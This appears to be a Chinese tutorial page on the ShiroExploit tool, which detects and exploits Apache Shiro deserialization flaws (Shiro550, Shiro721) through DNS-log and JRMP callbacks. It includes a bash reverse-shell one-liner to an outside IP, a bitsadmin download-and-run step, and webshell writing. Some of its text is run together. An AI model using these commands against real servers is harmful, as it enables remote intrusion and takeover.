您好,登錄后才能下訂單哦!
本篇內(nèi)容主要講解“Shiro漏洞檢測(cè)工具ShiroExploit怎么使用”,感興趣的朋友不妨來看看。本文介紹的方法操作簡(jiǎn)單快捷,實(shí)用性強(qiáng)。下面就讓小編來帶大家學(xué)習(xí)“Shiro漏洞檢測(cè)工具ShiroExploit怎么使用”吧!
支持對(duì)Shiro550(硬編碼秘鑰)和Shiro721(Padding Oracle)的一鍵化檢測(cè),支持簡(jiǎn)單回顯。
Shiro550
無(wú)需提供rememberMe Cookie, Shiro721
需要提供一個(gè)有效的rememberMe CookieShiro550
無(wú)需選擇操作系統(tǒng)類型, Shiro721
需要選擇操作系統(tǒng)類型使用 ceye.io 進(jìn)行漏洞檢測(cè)
URLDNS
篩選出唯一 Key,然后依次調(diào)用各個(gè) Gadget 生成 Payload使用 dnslog.cn 進(jìn)行漏洞檢測(cè)
dnslog.cn
申請(qǐng)一個(gè) DNS Record。URLDNS
篩選出唯一 Key,然后依次調(diào)用各個(gè) Gadget 生成 Payload使用 JRMP + dnslog 進(jìn)行漏洞檢測(cè)
java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port]
開啟HttpService/JRMPListener,并按照要求填入相應(yīng) IP 和端口HTTPService
默認(rèn)監(jiān)聽 8080
端口, JRMPListener
默認(rèn)監(jiān)聽 8088
端口JRMP
的方式進(jìn)行漏洞檢測(cè),可以顯著減小 cookie 大小URLDNS
篩選出唯一 Key,然后使用 JRMP
依次為各個(gè) Gadget 生成對(duì)應(yīng)的 JRMPListener使用回顯進(jìn)行漏洞檢測(cè)
https://blog.csdn.net/fnmsd/article/details/106709736
介紹的方式實(shí)現(xiàn)回顯,在本地可以測(cè)試成功,但是在實(shí)際環(huán)境中基本不成功(可能是我的姿勢(shì)有問題,歡迎探討),所以目前是通過讀寫文件的方式實(shí)現(xiàn)回顯,后期可能會(huì)加入其它方式反彈shell(linux)
采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1
的方式反彈 shell反彈shell(Windows)
采用 bitsadmin
下載指定 URL 的 exe 文件并執(zhí)行的方式獲取 shell獲取Webshell
可以在能夠回顯的情況下直接在使用者給出的路徑(目錄需要真實(shí)存在)下寫入 webshell, webshell 名稱和后綴名由使用者自行指定,webshell 的內(nèi)容從 config 目錄下的 shell.jsp 中讀取到此,相信大家對(duì)“Shiro漏洞檢測(cè)工具ShiroExploit怎么使用”有了更深的了解,不妨來實(shí)際操作一番吧!這里是億速云網(wǎng)站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。